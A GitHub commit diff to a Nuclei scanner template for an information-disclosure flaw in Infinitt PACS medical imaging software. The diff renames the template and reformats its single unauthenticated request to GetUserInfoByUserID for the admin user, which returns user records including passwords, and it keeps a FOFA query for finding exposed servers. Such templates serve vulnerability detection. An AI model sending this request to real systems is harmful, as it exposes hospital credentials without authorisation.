Update infinitt-pacs-info-leak.yaml

projectdiscovery · Dec 23, 2024 · 4713b7d · 4713b7d
1 parent 3aa26de
commit 4713b7d
Showing 1 changed file with 9 additions and 10 deletions.
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
@@ -1,32 +1,31 @@
-id: infinitt-pacs-info-leak
+id: infinitt-pacs-info-disclosure
 
 info:
-  name: Infinitt PACS System - Information Leak
+  name: Infinitt PACS System - Information Disclosure
   author: adeljck
   severity: high
   description: |
-    Infinitt PACS System is vulnerable to an information leak vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
+    Infinitt PACS System is vulnerable to an Information Disclosure vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
   remediation: |
     Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
   metadata:
     verified: true
     max-request: 1
     fofa-query: icon_hash="1474455751" || icon_hash="702238928"
-  tags: infinitt,info-leak
+  tags: infinitt,disclosure,exposure
 
 http:
-  - raw:
-      - |
-        GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin"
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "web_user_login"
-          - "USER_KEY"
+          - "<web_user_login>"
+          - "<USER_KEY>"
         condition: and
 
       - type: word